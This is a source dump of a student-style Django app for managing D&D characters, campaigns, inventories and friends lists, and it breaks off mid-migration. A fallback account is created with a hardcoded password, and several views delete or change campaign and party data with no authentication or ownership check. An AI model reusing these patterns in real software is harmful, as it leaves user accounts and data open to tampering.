https://github.com/NickJacksonDev/DnD-Manager
e777951268ca5f7a9a62dd9410446c5ee092158c
36f416e56770a2a8c60e93652c084e32f96f86fa
6052b1d422ebcbfc0f169ec613b1f71da976bdb8
refs/heads/master
2020-04-21T04:14:34.279087
2019-04-08T16:45:44
2019-04-08T16:45:44
169,307,667
1
0
null
2019-02-05T20:28:12
2019-04-08T15:23:16
2019-04-08T16:45:45
Python
[ { "alpha_fraction": 0.71403568983078, "alphanum_fraction": 0.7189359664916992, "avg_line_length": 37.778282165527344, "blob_id": "f24821f573db5c74431bbec3b30e7f9e3188a8e7", "content_id": "ab67b99c2a5003e817bda6c5b5b4fd7abb5708d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8571, "license_type": "no_license", "max_line_length": 130, "num_lines": 221, "path": "/Character_Builder/models.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\nfrom datetime import datetime\n\n# Notes (Django models)\n# Each model acts more or less like a database table\n# Each model's field acts like a column in said table\n# Foreign Keys act as a thing that links a class\n# to a parent class that uses it.\n# eg: abilityScore's \"characterID\" is a foreign key\n# https://docs.djangoproject.com/en/2.1/topics/db/models/\n# can do fieldName = ___Field(blank = true) to make this field optional\n# can do fieldName = ___Field(choices = LIST_NAME) to make it have a dropdown to the choices given\n# can do from geography.models import ZipCode\n\n# Constants\n# Should I move this next to the class that uses it?\nMAX_LENGTH_CHARACTER_NAME = 255\nMAX_LENGTH_ALIGNMENT = 255\nMAX_LENGTH_SIZE = 255\nDEFAULT_LEVEL = 0\nDEFAULT_XP = 0\nDEFAULT_HP = 6\n\nMAX_LENGTH_ABILITY_NAME = 255\n\nMAX_LENGTH_CLASS_NAME = 255\nMAX_LENGTH_HIT_DICE = 255\n\nMAX_LENGTH_RACE_NAME = 255\n\nDEFAULT_ABILITY_SCORE = 10\nDEFAULT_ABILITY_SCORE_BONUS = 0\n\nDEFAULT_DATETIME = datetime.min\n\n\n# Description of this model file\n# Much of this will be based off of the database schemas\n\n# As this is in the character builder folder, this will focus on\n# the character information\n\n# finds a default user\ndef defaultUser():\n default = User.objects.first()\n\n if default is None:\n default = User.objects.create_user('defaultUser', password='djangoproject', last_login=DEFAULT_DATETIME)\n\n return default\n\n# Sets default race to human\ndef defaultRace():\n default = CharacterRace.objects.first()\n\n if default is None:\n default = CharacterRace(\n raceName='Human',\n speed=30,\n size='Medium',\n\n strengthBonus=1,\n dexterityBonus=1,\n constitutionBonus=1,\n intelligenceBonus=1,\n wisdomBonus=1,\n charismaBonus=1\n )\n default.save()\n\n # Returns the primary key, not the race itself\n return default.raceID\n\n# Sets default class to fighter\ndef defaultClass():\n default = CharacterClass.objects.first()\n\n if default is None:\n default = CharacterClass(\n className='Fighter',\n hitDice='d8'\n )\n default.save()\n \n return default.characterID\n\n\n# This class is largely static, like a lookup table\n# Note: because the character has a key to this, it must\n# be above the Character class\nclass CharacterRace(models.Model):\n raceID = models.AutoField(primary_key=True)\n raceName = models.CharField(max_length = MAX_LENGTH_RACE_NAME)\n speed = models.IntegerField()\n size = models.CharField(max_length = MAX_LENGTH_SIZE) # Okay to overload?\n\n # Welp, I'm going to make this simpler and just hard-code\n # the 6 most essential stats\n strengthBonus = models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n dexterityBonus = models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n constitutionBonus = models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n intelligenceBonus = models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n wisdomBonus = 
models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n charismaBonus = models.IntegerField(default=DEFAULT_ABILITY_SCORE_BONUS)\n\n # Outdated code\n # abilityScoreBonusSetID = models.IntegerField() # Same level of abstraction?\n # character = models.ForeignKey(Character, on_delete=models.CASCADE, null=True)\n\n def __str__(self):\n return self.raceName\n\n\n\n# This class is largely static, like a lookup table\nclass CharacterClass(models.Model):\n # TODO: Maybe use ManyToMany relationship, as one character may have multiple \n # classes... Oh wait. That's actually something to consider... \n # character = models.ForeignKey(Character, on_delete=models.CASCADE, null=True, blank=True) \n characterID = models.AutoField(primary_key=True)\n className = models.CharField(max_length = MAX_LENGTH_CLASS_NAME)\n hitDice = models.CharField(max_length = MAX_LENGTH_HIT_DICE)\n\n def __str__(self):\n return self.className\n\n\n\n\n\n\n# This class is dynamic, the level, xp, hp, alignment, and (rarely) size may change\nclass Character(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, default=defaultUser, null=True, blank=True)\n characterID = models.AutoField(primary_key=True) # Note that Django has a built-in primary key\n characterName = models.CharField(max_length = MAX_LENGTH_CHARACTER_NAME) # Is this a consistent level of abstraction?\n level = models.IntegerField(default=DEFAULT_LEVEL) # may have to split this up into a list as you may have multiple classes...\n xp = models.IntegerField(default=DEFAULT_XP)\n maxHP = models.IntegerField(default=DEFAULT_HP)\n currentHP = models.IntegerField(default=DEFAULT_HP)\n alignment = models.CharField(max_length = MAX_LENGTH_ALIGNMENT) # Use string or an enum?\n size = models.CharField(max_length = MAX_LENGTH_SIZE) # Use string or enum?\n public = models.BooleanField(default=True)\n\n # blank=true, null=true means that it's optional\n # Since race and class are constant, you DO NOT want to delete them upon\n # deleting this character.\n # Also, when restarting the database, it's important to only add one\n # foreign key per migration. 
As such, there are currently 3\n # foreign keys in character: User, race, and characterClass.\n # The current solution: comment out all but 1, make and migrate, then repeat\n # one at a time.\n race = models.ForeignKey(CharacterRace, on_delete=models.PROTECT, default=defaultRace, null=True, blank=True)\n characterClass = models.ForeignKey(CharacterClass, on_delete=models.PROTECT, default=defaultClass, null=True, blank=True)\n\n # Outdated variables\n #raceID = models.IntegerField()\n #classID = models.IntegerField()\n #abilityScoreSetID = models.AutoField(primary_key=True)\n\n strength = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n dexterity = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n constitution = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n intelligence = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n wisdom = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n charisma = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n\n\n # This method returns a string that represents this class.\n # Similar to toString() from java\n def __str__(self):\n return self.characterName\n\n\n # Should associate a user with the character when initialized\n def save_model(self, request, obj, form, change):\n if obj.user == defaultUser:\n # Only set user during the first save.\n obj.user = request.user\n #super().save_model(request, obj, form, change)\n\n\n # When you create/update a character, this is where the\n # page goes to after you save the character\n def get_absolute_url(self):\n return reverse('character-detail', kwargs={'pk': self.pk})\n\n\n# This class is static, like a lookup table\nclass AbilityScore(models.Model):\n abilityName = models.CharField(max_length = MAX_LENGTH_ABILITY_NAME)\n\n# This class is dynamic, the abilityScoreValues may change\n# Now outdated, refactored so that we don't have to access another form\n# from within a form (there were 2 forms on a page, and you had to access it again)\nclass AbilityScoreSet(models.Model):\n abilityScoreSetID = models.AutoField(primary_key=True)\n character = models.ForeignKey(Character, on_delete=models.CASCADE)#, default=defaultCharacter)\n\n # One set has many ability scores.\n # However, each ability score may go to multiple sets (like an enumeration)\n # Thus a manyToMany relationship is used\n # Note: only one of the two classes should have a manyToMany Field\n # abilityScores = models.ManyToManyField(AbilityScore)\n # abilityScoreValue = models.IntegerField()\n\n strength = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n dexterity = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n constitution = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n intelligence = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n wisdom = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n charisma = models.IntegerField(default=DEFAULT_ABILITY_SCORE)\n\n # Needed to save model\n def save_model(self, request, obj, form, change):\n # Updates the character to be the one it's associated with\n # if obj.character = defaultCharacter :\n\n super().save_model(request, obj, form, change)\n\n" }, { "alpha_fraction": 0.6569263935089111, "alphanum_fraction": 0.6585497856140137, "avg_line_length": 32.272727966308594, "blob_id": "ec5ddce6c8cb4642c1a7ffb04ee6ea959bef1620", "content_id": "514c37fa9f188b412213d268aca3f5073ba594a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1848, "license_type": "no_license", "max_line_length": 68, "num_lines": 55, "path": 
"/Campaign_Manager/tests.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom .models import *\nfrom Character_Builder.models import *\n\n# Campaign test cases\nclass CampaignCreateTestCase(TestCase):\n def setUp(self):\n Campaign.objects.create(campaignName=\"The Mountain\")\n\n def test_campaign_name(self):\n try:\n Campaign.objects.get(campaignName=\"The Mountain\")\n except:\n self.fail()\n\n def test_campaign_id(self):\n campaign = Campaign.objects.get(campaignName=\"The Mountain\")\n self.assertEqual(campaign.campaignID, 1)\n\n# CampaignDM test cases\nclass CampaignDMCreateTestCase(TestCase):\n def setUp(self):\n Campaign.objects.create(campaignName=\"The Mountain\")\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n CampaignDM.objects.create(campaign=camp)\n\n def test_campaign_dm_id(self):\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n dm = CampaignDM.objects.get(campaign=camp)\n self.assertEqual(dm.campaignDMID, 1)\n\n def test_campaign_dm_campaign(self):\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n try:\n dm = CampaignDM.objects.get(campaign=camp)\n except:\n self.fail()\n\nclass PartyCreateTestCase(TestCase):\n def setUp(self):\n Campaign.objects.create(campaignName=\"The Mountain\")\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n Party.objects.create(campaign=camp)\n\n def test_party_id(self):\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n party = Party.objects.get(campaign=camp)\n self.assertEqual(party.partyID, 1)\n\n def test_party_campaign(self):\n camp = Campaign.objects.get(campaignName=\"The Mountain\")\n try:\n Party.objects.get(campaign=camp)\n except:\n self.fail()\n\n \n " }, { "alpha_fraction": 0.6124721765518188, "alphanum_fraction": 0.6169264912605286, "avg_line_length": 25.47058868408203, "blob_id": "c2729d265d7ab03e517d7175f3eb93130b0f13e7", "content_id": "186b6574d159e61ffe9b89bdef1d861e0bd03b37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 449, "license_type": "no_license", "max_line_length": 70, "num_lines": 17, "path": "/Campaign_Manager/templates/Campaign_Manager/campaigncomment_form.html", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "{% extends \"Campaign_Manager/campaign_base.html\" %}\n{% load crispy_forms_tags %}\n{% block content %}\n\n <h1>Post A Comment</h1>\n\n\t{% if userIsDM %}\n\t\t<form method=\"post\" class=\"post-form\" enctype=\"multipart/form-data\">\n\t \t{% csrf_token %}\n\t\t\t{{ form|crispy }}\n\t\t\t<input type=\"submit\" value=\"Post\" class=\"btn btn-dark\">\n\t\t</form>\n\t{% else %}\n\t <small class=\"text-muted\">You Must Be A DM To Comment</small>\n\t{% endif %}\n\n{% endblock content %}" }, { "alpha_fraction": 0.8219178318977356, "alphanum_fraction": 0.8219178318977356, "avg_line_length": 23.33333396911621, "blob_id": "6a5d0bef24856c6fd9ff95dee77091867162d56e", "content_id": "3f2a1eaee4a545c00aa785ae3cb8663866257f28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 146, "license_type": "no_license", "max_line_length": 32, "num_lines": 6, "path": "/Users/admin.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Profile\nfrom .models import Friend\n\nadmin.site.register(Profile)\nadmin.site.register(Friend)\n" }, { "alpha_fraction": 0.5192604064941406, 
"alphanum_fraction": 0.526964545249939, "avg_line_length": 22.178571701049805, "blob_id": "07dd14092655c348276b50f7c98296896b157ff0", "content_id": "e9fb252b1e3958cfd1e432a30f5cdc8036851806", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1298, "license_type": "no_license", "max_line_length": 163, "num_lines": 56, "path": "/Users/templates/Users/profile.html", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "{% extends \"Users/account_base.html\" %}\n{% block content %}\n\n<main role=\"main\" class=\"container\">\n\t<div class=\"row\">\n\t\t<div class=\"col-md-12\">\n\n\t\t\t<div class=\"content-section\">\n\t\t\t\t<h1>Current Campaigns</h1>\n\t\t\t\t<ul class=\"list-unstyled\">\n\n\t\t\t\t\t{% for Campaign in campaigns %}\n\t\t\t\t\t\t<li class=\"media\">\n\t\t\t\t\t\t\t<div class=\"media-body\">\n\t\t\t\t\t\t\t\t<h4><a href=\"{% url 'overview_with_pk' Campaign.campaignID %}\">{{ Campaign.campaignName }}</a></h4>\n\t\t\t\t\t\t\t\tCampaign ID: {{ Campaign.campaignID }}\n\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t</li>\n\t\t\t\t\t{% endfor %}\n\n\t\t\t\t</ul>\n\t\t\t</div>\n\n\t\t\t<div class=\"content-section\">\n\t\t\t\t<h1>Characters</h1>\n\t\t\t\t<ul class=\"list-unstyled\">\n\n\t\t\t\t\t{% for Character in characters %}\n\t\t\t\t\t\t\t{% if Character.user == user %}\n\t\t\t\t\t\t\t\t\t<li class=\"media \">\n\t\t\t\t\t\t\t\t\t\t<div class=\"media-body\">\n\t\t\t\t\t\t\t\t\t\t\t<h4 class=\"media-heading\">\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"{% url 'character-detail' Character.characterID %}\">{{ Character.characterName }}</a> Level {{ Character.level }} HP: {{ Character.hp }}</h4>\n\t\t\t\t\t\t\t\t\t\t\tRace: {{ Character.raceID }}\n\t\t\t\t\t\t\t\t\t\t\tClass: {{ Character.classID }}\n\t\t\t\t\t\t\t\t\t\t\tAlignment: {{ Character.alignment }}\n\t\t\t\t\t\t\t\t\t\t\tXP: {{ Character.xp }}\n\t\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t</li>\n\t\t\t\t\t\t\t{% endif %}\n\n\t\t\t\t\t{% endfor %}\n\n\t\t\t\t</ul>\n\t\t\t</div>\n\n\n\n\n\t\t</div>\n\t</div>\n</main>\n\n\n\n{% endblock content %}\n" }, { "alpha_fraction": 0.5838287472724915, "alphanum_fraction": 0.5939357876777649, "avg_line_length": 18.125, "blob_id": "89a48f2012b150a170ee30b33eccb2caf70e7a3e", "content_id": "2c25ea617b603701b4c7719f5962648f713fe14c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1682, "license_type": "no_license", "max_line_length": 60, "num_lines": 88, "path": "/Character_Builder/management/commands/populate_class_db.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.core.management.base import BaseCommand\nfrom Character_Builder.models import (\n CharacterClass\n)\n\n# Populates the user base with 2 simple default users\nclass Command(BaseCommand):\n # args = '<foo bar ...>'\n help = 'Populate the Class data base'\n\n def _create_classes(self):\n # As fighter was declared as the \"default class\", it \n # is therefore commented out here to prevent redundancy.\n # fighter = CharacterClass(\n # className='Fighter',\n # hitDice='d10'\n # )\n # fighter.save()\n\n barbarian = CharacterClass(\n className='Barbarian',\n hitDice='d12'\n )\n barbarian.save()\n\n bard = CharacterClass(\n className='Bard',\n hitDice='d8'\n )\n bard.save()\n\n cleric = CharacterClass(\n className='Cleric',\n hitDice='d8'\n )\n cleric.save()\n\n druid = CharacterClass(\n className='Druid',\n hitDice='d8'\n )\n druid.save()\n\n monk = CharacterClass(\n 
className='Monk',\n hitDice='d8'\n )\n monk.save()\n\n paladin = CharacterClass(\n className='Paladin',\n hitDice='d10'\n )\n paladin.save()\n\n ranger = CharacterClass(\n className='Ranger',\n hitDice='d10'\n )\n ranger.save()\n\n rogue = CharacterClass(\n className='Rogue',\n hitDice='d8'\n )\n rogue.save()\n\n sorcerer = CharacterClass(\n className='Sorcerer',\n hitDice='d6'\n )\n sorcerer.save()\n\n warlock = CharacterClass(\n className='Warlock',\n hitDice='d8'\n )\n warlock.save()\n\n wizard = CharacterClass(\n className='Wizard',\n hitDice='d6'\n )\n wizard.save()\n\n\n def handle(self, *args, **options):\n self._create_classes()" }, { "alpha_fraction": 0.6222066879272461, "alphanum_fraction": 0.6375698447227478, "avg_line_length": 38.77777862548828, "blob_id": "4bc6da86bab7e13cc42f0cae4ebb9a5ad992a00a", "content_id": "88604f6e359ab8dad7bcedbd92ff9403db10f435", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1432, "license_type": "no_license", "max_line_length": 179, "num_lines": 36, "path": "/Inventory/migrations/0001_initial.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.7 on 2019-04-08 02:08\n\nimport Inventory.models\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('Character_Builder', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Inventory',\n fields=[\n ('inventoryID', models.AutoField(primary_key=True, serialize=False)),\n ('character', models.ForeignKey(default=Inventory.models.defaultCharacter, on_delete=django.db.models.deletion.CASCADE, to='Character_Builder.Character')),\n ],\n ),\n migrations.CreateModel(\n name='Item',\n fields=[\n ('itemID', models.AutoField(primary_key=True, serialize=False)),\n ('itemName', models.CharField(max_length=255)),\n ('public', models.BooleanField(default=True)),\n ('inventory', models.ForeignKey(default=Inventory.models.defaultInventory, on_delete=django.db.models.deletion.CASCADE, to='Inventory.Inventory')),\n ('user', models.ForeignKey(blank=True, default=Inventory.models.defaultUser, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.712067723274231, "alphanum_fraction": 0.7205363512039185, "avg_line_length": 24.763635635375977, "blob_id": "36d75dbb4a3ec31ac747489434460bef940f11ef", "content_id": "0d95b03a23e0d340d6dd44d9b2fb9d97c2fc28c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1417, "license_type": "no_license", "max_line_length": 98, "num_lines": 55, "path": "/Users/models.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom PIL import Image\n\ndef defaultUser():\n default = User.objects.first()\n\n if default is None:\n default = User.objects.create_user('defaultUser', password='djangoproject')\n\n return default\n\nclass Profile(models.Model):\n\tuser = models.OneToOneField(User, on_delete=models.CASCADE)\n\timage = models.ImageField(default='default.png', upload_to='profile_pics')\n\n\tdef __str__(self):\n\t\treturn f'{self.user.username} Profile'\n\n\tdef save(self, **kwargs):\n\t\tsuper().save()\n\n\t\timage = 
Image.open(self.image.path)\n\n\t\tif image.width > 300 or image.height > 300:\n\t\t\toutput_size = (300, 300)\n\t\t\timage.thumbnail(output_size)\n\t\t\timage.save(self.image.path)\n\nclass FriendsList(models.Model):\n\towner = models.OneToOneField(User, on_delete=models.CASCADE)\n\n\tdef __str__(self):\n\t\treturn self.owner.username\n\nclass Friend(models.Model):\n\n\tusers = models.ManyToManyField(User, default=defaultUser)\n\n\tcurrent_user = models.ForeignKey(User, related_name='owner', null=True, on_delete=models.CASCADE)\n\n\n\t@classmethod\n\tdef make_friend(cls, current_user, new_friend):\n\t\tfriend, created = cls.objects.get_or_create(\n\t\t\tcurrent_user = current_user\n\t\t)\n\t\tfriend.users.add(new_friend)\n\n\t@classmethod\n\tdef unfriend(cls, current_user, new_friend):\n\t\tfriend, created = cls.objects.get_or_create(\n\t\t\tcurrent_user = current_user\n\t\t)\n\t\tfriend.users.remove(new_friend)\n" }, { "alpha_fraction": 0.7406576871871948, "alphanum_fraction": 0.7421524524688721, "avg_line_length": 29.386363983154297, "blob_id": "b49fcff838435b9fc151d9af8100a968a0d81ac6", "content_id": "d1266b39221de6157472f154c24cbac47cd91d19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1338, "license_type": "no_license", "max_line_length": 91, "num_lines": 44, "path": "/Inventory/tests.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom .models import *\nfrom Character_Builder.models import *\n\nclass ItemCreateTestCase(TestCase):\n\tdef setUp(self):\n\t\tCharacter.objects.create(characterName=\"Malikar\", alignment=\"Lawful Evil\", size=\"Medium\")\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tInventory.objects.create(character=char)\n\t\tinv = Inventory.objects.get(character=char)\n\t\tItem.objects.create(itemName=\"test item\", inventory=inv)\n\n\tdef test_inventory_id(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tinv = Inventory.objects.get(character=char)\n\t\tself.assertEqual(inv.inventoryID, 1)\n\n\tdef test_inventory_character(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\ttry:\n\t\t\tInventory.objects.get(character=char)\n\t\texcept:\n\t\t\tself.fail()\n\n\tdef test_item_id(self):\n\t\titem = Item.objects.get(itemName=\"test item\")\n\t\tself.assertEqual(item.itemID, 1)\n\n\tdef test_item_name(self):\n\t\ttry:\n\t\t\tItem.objects.get(itemName=\"test item\")\n\t\texcept:\n\t\t\tself.fail()\n\t\t\n\n\tdef test_item_inventory(self):\n\t\tchar = Character.objects.get(characterName=\"Malikar\")\n\t\tinv = Inventory.objects.get(character=char)\n\t\titem = Item.objects.get(itemName=\"test item\")\n\t\tself.assertEqual(item.inventory, inv)\n\n\tdef test_item_public(self):\n\t\titem = Item.objects.get(itemName=\"test item\")\n\t\tself.assertEqual(item.public, True)\t\t" }, { "alpha_fraction": 0.6454206109046936, "alphanum_fraction": 0.6454206109046936, "avg_line_length": 30.098215103149414, "blob_id": "355a2bda56b5f7bd593b536f8717448eec6e1125", "content_id": "7ca7d70a7e9ce8b5e45aba03ce776e6926176d68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6966, "license_type": "no_license", "max_line_length": 86, "num_lines": 224, "path": "/Campaign_Manager/views.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom 
.models import *\nfrom Character_Builder.models import Character\nfrom Campaign_Manager.models import Campaign\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom .forms import CreateCampaignForm, CreatePostForm\nfrom django.views.generic import (\n ListView,\n DetailView,\n CreateView,\n UpdateView,\n DeleteView\n)\nfrom Users.models import *\nfrom .urls import *\n\ndef home(request):\n form = CreateCampaignForm(request.POST or None)\n\n if form.is_valid():\n form.instance.creator = request.user\n form.save()\n return HttpResponseRedirect(reverse('campaign-list'))\n\n\n\n context = {\n 'title' : 'Campaigns',\n 'campaigns' : Campaign.objects.all(),\n 'characters' : Character.objects.all(),\n 'partys' : Party.objects.all(),\n 'partyCharacters' : PartyCharacter.objects.all(),\n 'campaignDMs' : CampaignDM.objects.all(),\n 'form' : form,\n 'posts': CampaignComment.objects.all(),\n }\n\n return render(request, 'Campaign_Manager/campaign_builder.html', context)\n\n\ndef overview(request, pk=None ):\n\n #hazy on this. I want to set the campaign to the campaign ref'd by the pk\n campaign = Campaign.objects.get(pk=pk)\n party, created = Party.objects.get_or_create(campaign = campaign)\n members = party.members.all()\n friend, created = Friend.objects.get_or_create(current_user=request.user)\n friends = friend.users.all()\n friends |= User.objects.filter(pk = request.user.pk)\n\n friendCharacters = None\n for friend in friends:\n if friendCharacters == None:\n friendCharacters = Character.objects.filter(user = friend)\n else:\n friendCharacters |= Character.objects.filter(user = friend)\n posts = CampaignComment.objects.filter(campaign = campaign)\n dms = CampaignDM.objects.filter(campaign = campaign)\n userIsDM = False\n for dm in dms:\n if dm.user == request.user:\n userIsDM = True\n\n\n context ={\n\n 'campaign' : campaign,\n #'users' : User.objects.exclude(id=request.user.id),\n 'campaigns' : Campaign.objects.all(),\n 'characters' : Character.objects.all(),\n 'title' : 'Overview',\n 'members' : members,\n 'friends' : friends,\n 'dms' : dms,\n 'userIsDM' : userIsDM,\n 'posts' : posts,\n 'friendCharacters' : friendCharacters,\n }\n\n return render(request, 'Campaign_Manager/overview.html', context)\n\ndef update_party(request, operation, pk, id):\n new_member = Character.objects.get(pk=pk)\n campaign = Campaign.objects.get(pk=id)\n if operation == 'add':\n Party.add_member(campaign, new_member)\n elif operation == 'remove':\n Party.remove_member(campaign, new_member)\n return redirect('overview_with_pk', pk=campaign.pk)\n\ndef confirmDeletion(request, pk):\n campaign = Campaign.objects.get(pk=pk)\n\n context = {\n 'campaign' : campaign,\n\n }\n\n return render(request, 'Campaign_Manager/campaign_confirm_deletion.html', context)\n\n\ndef deleteCampaign(request, pk):\n campaign = Campaign.objects.get(pk=pk)\n #Campaign.objects.delete(campaign)\n campaign.delete()\n return redirect('campaign-list')\n\nclass CampaignListView(ListView):\n model = Campaign\n context_object_name = 'campaigns'\n\n\nclass CampaignDetailView(DetailView):\n model = Campaign\n\n def get_context_data(self, **kwargs):\n context=super().get_context_data(**kwargs)\n campaign=self.get_object()\n context['posts'] = CampaignComment.objects.filter(campaign=campaign)\n dms = CampaignDM.objects.filter(campaign=campaign)\n context['userIsDM'] = False\n for dm in dms:\n if dm.user == self.request.user:\n context['userIsDM'] = True\n\n return context\n\n\nclass CampaignCreateView(CreateView):\n model 
= Campaign\n fields = ['campaignName']\n\n def form_valid(self, form):\n form.instance.creator = self.request.user\n return super().form_valid(form)\n\n\nclass CampaignCommentCreateView(CreateView):\n model = CampaignComment\n form_class = CreatePostForm\n\n def get_context_data(self, **kwargs):\n context = super(CampaignCommentCreateView, self).get_context_data(**kwargs)\n campaign=Campaign.objects.get(pk=self.kwargs.get('pk'))\n dms = CampaignDM.objects.filter(campaign=campaign)\n context['userIsDM'] = False\n for dm in dms:\n if dm.user == self.request.user:\n context['userIsDM'] = True\n\n return context\n\n def form_valid(self, form):\n f = form.save(commit=False)\n f.author = self.request.user\n f.campaign = Campaign.objects.get(campaignID=self.kwargs['pk'])\n f.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('overview_with_pk', kwargs={'pk':self.kwargs['pk']})\n\n\nclass CampaignCommentDetailView(DetailView):\n model = CampaignComment\n\n def get_context_data(self, **kwargs):\n context=super(CampaignCommentDetailView, self).get_context_data(**kwargs)\n context['post'] = self.get_object()\n context['author'] = self.get_object().author\n return context\n\nclass CampaignCommentEditView(UpdateView):\n model = CampaignComment\n form_class = CreatePostForm\n\n def get_context_data(self, **kwargs):\n context = super(CampaignCommentEditView, self).get_context_data(**kwargs)\n campaign=Campaign.objects.get(pk=self.kwargs.get('fk'))\n dms = CampaignDM.objects.filter(campaign=campaign)\n context['userIsDM'] = False\n for dm in dms:\n if dm.user == self.request.user:\n context['userIsDM'] = True\n\n return context\n return context\n\n def form_valid(self, form):\n f = form.save(commit=False)\n f.author = self.request.user\n f.campaign = Campaign.objects.get(campaignID=self.kwargs['fk'])\n f.save()\n return super().form_valid(form)\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n def get_success_url(self):\n return reverse_lazy('overview_with_pk', kwargs={'pk':self.kwargs['fk']})\n\n\nclass CampaignCommentDeleteView(DeleteView):\n model = CampaignComment\n\n def get_context_data(self, **kwargs):\n context=super(CampaignCommentDeleteView, self).get_context_data(**kwargs)\n context['post'] = self.get_object()\n context['author'] = self.get_object().author\n return context\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n def get_success_url(self):\n return reverse_lazy('overview_with_pk', kwargs={'pk':self.kwargs['fk']})\n" }, { "alpha_fraction": 0.6047753691673279, "alphanum_fraction": 0.6126295924186707, "avg_line_length": 47.227272033691406, "blob_id": "ae269eb897b10b4ea14092d2faa802f4e2dacb45", "content_id": "44b08cd9a85ce7624b01c9dd9eb0187546a8fb1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3183, "license_type": "no_license", "max_line_length": 166, "num_lines": 66, "path": "/Campaign_Manager/migrations/0001_initial.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.7 on 2019-04-08 02:08\n\nimport Campaign_Manager.models\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('Character_Builder', 
